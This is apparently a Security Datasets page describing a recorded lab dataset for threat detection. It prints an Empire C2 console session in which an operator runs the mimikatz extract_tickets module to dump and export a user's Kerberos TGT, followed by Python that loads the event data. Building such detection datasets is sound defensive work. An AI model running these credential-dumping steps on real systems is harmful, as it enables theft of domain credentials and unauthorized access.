Empire Mimikatz Extract Kerberos Keys
Contents
Empire Mimikatz Extract Kerberos Keys#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2019/09/21 |
Tactics |
|
Techniques |
|
Tags |
Kerberos Tickets |
Dataset Description#
This dataset represents adversaries extracting kerberos tickets from memory.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
WE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5972 5/0.0 2020-09-22 07:35:29 http
(Empire: agents) > interact WE8XYD3K
(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) > info
Name: Invoke-Mimikatz extract kerberos tickets.
Module: powershell/credentials/mimikatz/extract_tickets
NeedsAdmin: False
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
@JosephBialek
@gentilkiwi
Description:
Runs PowerSploit's Invoke-Mimikatz function to extract
kerberos tickets from memory in base64-encoded form.
Comments:
http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True WE8XYD3K Agent to run module on.
(Empire: powershell/credentials/mimikatz/extract_tickets) > execute
[*] Tasked WE8XYD3K to run TASK_CMD_JOB
[*] Agent WE8XYD3K tasked with task ID 1
[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets
(Empire: powershell/credentials/mimikatz/extract_tickets) >
Job started: PY68ZG
Hostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # standard::base64
isBase64InterceptInput is false
isBase64InterceptOutput is false
mimikatz(powershell) # kerberos::list /export
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM
Server Name : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL
Client Name : pgustavo @ THESHIRE.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
* Saved to file : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi
(Empire: powershell/credentials/mimikatz/extract_tickets) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_extract_keys.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)